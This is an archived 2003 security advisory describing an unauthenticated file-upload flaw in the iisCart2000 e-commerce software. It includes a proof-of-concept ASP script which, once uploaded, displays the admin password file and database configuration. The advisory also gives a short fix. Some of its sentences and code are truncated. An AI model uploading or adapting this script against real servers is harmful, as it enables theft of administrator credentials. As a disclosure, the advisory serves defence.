Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: e-commerce, shopping carts :: bt322.txt

iisCart2000 Administration Security Leak

1ndonesian Security Team (1st)
Security Advisory

Advisory Name: iisCart2000 Administration Security Leak
 Release Date: 05/10/2003
  Application: Latest
     Platform: Win32
     Severity: High/Remote 
     BUG Type: Security Leak
       Author: Bosen <>
  Discover by: Bosen <>
Vendor Status: Notified, see response below.
   Vendor URL:

iisCART2000 is a next generation ASP component based Ecommerce 
With over 150 methods and properties, iisCART2000 puts significant new 
in the hands of ASP web masters and developers.  Building on 2 years of 
iisCART2000 incorporates clients suggestions as well as many ground 
breaking developer 
iisCART2000 adds browser based file upload functionality.  
This new feature allows you to upload images at the same time you are 
adding data 
to the items table in your database without having to use FTP or 
iisCART2000 even fills in the image path information for subsequent 
dynamic display.
Unfortunetly this browser based file upload has a leak. Which is couse 
an attacker
can upload any type of file including .asp into web server. 

iiCART2k comes with 2 type. The advance and the basic version.
In the advance version vulnerability lies on /admin/upload.asp, and in 
the basic version
lies on /upload.asp. Both of the script does not check priviledge. And 
they all unprotected.
These will couse any attacker upload thei malicious 
file/script/programs/ into server.
Not just that, beside you can upload it via your own form. The 
iisCART2K it self provide
both /admin/upload.htm and /upload.htm that makes attacker would be 
more easier to do they job. 
And again since the file extention is .htm, it doesnt check any 
privilegde permission also.

These is a little demonstration how to get some information including 
admin login
and passwd and also database information.
// 1ndonesian Security Team
<% @ Language = JScript %>
function WinPath(absPath) {this.absolutePath = absPath;}
function getAbsPath() {return this.absolutePath;}
WinPath.prototype.getAbsolutePath = getAbsPath;

function fileRead(file) {
  var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = ""
  var tmp = file, f, g = FSO.GetFile(tmp);
  f = FSO.OpenTextFile(tmp, 1, false);
  strOut = "<PRE STYLE=\"font-size:9pt;\">";
  strOut+= Server.HTMLEncode(f.ReadAll());
  strOut+= "</PRE>";

var a = new WinPath(Server.Mappath("/")); 
var curDir   = a.getAbsolutePath();

// You can change these
var admin = curDir + "\\advanced\\admin\\pswd.asp";

with (Response) {
  Write("<b>ServerRoot : "+curDir+"<br></b>");
  Write("<b>Admin Info : "+admin+"<br><br></b>");
Upload this file, and browse it. It will shows you current 
configurations file.
You may change the admin path, and db path, depend on target URL.

Vendor Response:
No Response

a. Put these code in top of the line of upload.asp
<!--#include file="pswd.asp" -->

1ndonesian Security Team (1st) Advisory:

About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced 
security assessment. Based in Indonesia, 1ndonesian Security Team 
offers best of
breed security consulting services, specialising in application, host 
and network
security assessments.

1st provides security information and patches for use by the entire 1st 

This information is provided freely to all interested parties and may 
redistributed provided that it is not altered in any way, 1st is 
credited and the document retains.

Greetz to: 
AresU, TioEuy, sakitjiwa, syzwz, 
and all 1ndonesian Security Team

Bosen <>
Original document can be fount at

This mail sent through

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH